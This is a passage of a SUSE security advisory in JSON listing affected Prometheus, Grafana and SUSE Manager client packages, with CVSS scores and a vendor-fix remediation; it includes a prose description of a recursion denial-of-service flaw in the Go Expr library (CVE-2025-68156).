"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-61140"
},
{
"cve": "CVE-2025-68156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68156"
}
],
"notes": [
{
"category": "general",
"text": "Expr is an expression language and expression evaluation for Go. Prior to version 1.17.7, several builtin functions in Expr, including `flatten`, `min`, `max`, `mean`, and `median`, perform recursive traversal over user-provided data structures without enforcing a maximum recursion depth. If the evaluation environment contains deeply nested or cyclic data structures, these functions may recurse indefinitely until exceed the Go runtime stack limit. This results in a stack overflow panic, causing the host application to crash. While exploitability depends on whether an attacker can influence or inject cyclic or pathologically deep data into the\nevaluation environment, this behavior represents a denial-of-service (DoS) risk and affects overall library robustness. Instead of returning a recoverable evaluation error, the process may terminate unexpectedly. In affected versions, evaluation of expressions that invoke certain builtin functions on untrusted or insufficiently validated data structures can lead to a process-level crash due to stack exhaustion. This issue is most relevant in scenarios where Expr is used to evaluate expressions against externally supplied or dynamically constructed environments; cyclic references (directly or indirectly) can be introduced into arrays, maps, or structs; and there are no application-level safeguards preventing deeply nested input data. In typical use cases with controlled, acyclic data, the issue may not manifest. However, when present, the resulting panic can be used to reliably crash the application, constituting a denial of service. The issue has been fixed in the v1.17.7 versions of Expr. The patch introduces a maximum recursion depth limit for affected builtin functions. When this limit is exceeded, evaluation aborts gracefully and returns a descriptive error instead of panicking. Additionally, the maximum depth can be customized by users via `builtin.MaxDepth`, allowing applications with legitimate deep structures to raise the limit in a controlled manner. Users are strongly encouraged to upgrade to the patched release, which includes both the recursion guard and comprehensive test coverage to prevent regressions. For users who cannot immediately upgrade, some mitigations are recommended. Ensure that evaluation environments cannot contain cyclic references, validate or sanitize externally supplied data structures before passing them to Expr, and/or wrap expression evaluation with panic recovery to prevent a full process crash (as a last-resort defensive measure). These workarounds reduce risk but do not fully eliminate the issue without the patch.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68156",
"url": "https://www.suse.com/security/cve/CVE-2025-68156"
},
{
"category": "external",
"summary": "SUSE Bug 1255330 for CVE-2025-68156",
"url": "https://bugzilla.suse.com/1255330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
